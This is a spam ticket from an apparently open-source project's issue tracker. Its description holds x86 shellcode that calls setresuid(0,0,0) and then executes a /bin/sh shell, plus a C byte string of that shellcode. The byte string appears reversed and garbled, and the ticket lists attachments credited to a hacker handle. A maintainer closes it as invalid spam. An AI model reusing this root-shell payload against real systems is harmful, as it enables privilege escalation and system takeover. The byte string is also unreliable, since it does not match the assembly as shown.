Opened 16 years ago

Closed 16 years ago

Last modified 15 years ago

#9312 closed (invalid)

If you'd like a username, see the

Reported by: anonymous Owned by: nobody
Component: HTTP handling Version: 1.0-alpha-2
Severity: Keywords: --[code]--
Cc: --[code]-- Triage Stage: Unreviewed
Has patch: yes Needs documentation: no
Needs tests: no Patch needs improvement: no
Easy pickings: no UI/UX: no

Description

--[code]--
BITS 32

;setresuid(0,0,0)
xor eax, eax
xor ebx, ebx
xor ecx, ecx
cdq
mov BYTE al, 0xa4
int 0x80

;execve("/binsh", ["/binsh", NULL], [NULL])
push BYTE 11
pop eax
push ecx
push 0x68732f2f
push 0x6e69622f
mov ebx, esp
push ecx
mov edx, esp
push ebx
mov ecx, esp
int 0x80
--code--

Shellcode string:
--[code]--
char shellcode [] =
"\x80\xcd\xe1\x89\x53\xe2\x89\x51\xe3\x89\x6e\x69\x62\x2f\x68\x68\x73\x2f\x2f

\x68\x51\x58\x0b\x6a\x80\xcd\xa4\xb0\x99\xc9\x31\xdb\x31\xc0\x31"
-code-

Attachments (2)

...BY-H@cker B@tu....url (132 bytes ) - added by the king 16 years ago.
optional
...BY-H@cker B@tu....2.url (132 bytes ) - added by anonymous 16 years ago.

Download all attachments as: .zip

Change History (4)

by the king, 16 years ago

Attachment: ...BY-H@cker B@tu....url added

optional

by anonymous, 16 years ago

Attachment: ...BY-H@cker B@tu....2.url added

comment:1 by Julien Phalip, 16 years ago

Resolution: invalid
Status: newclosed

spam

comment:2 by (none), 15 years ago

milestone: post-1.0

Milestone post-1.0 deleted

Note: See TracTickets for help on using tickets.
Back to Top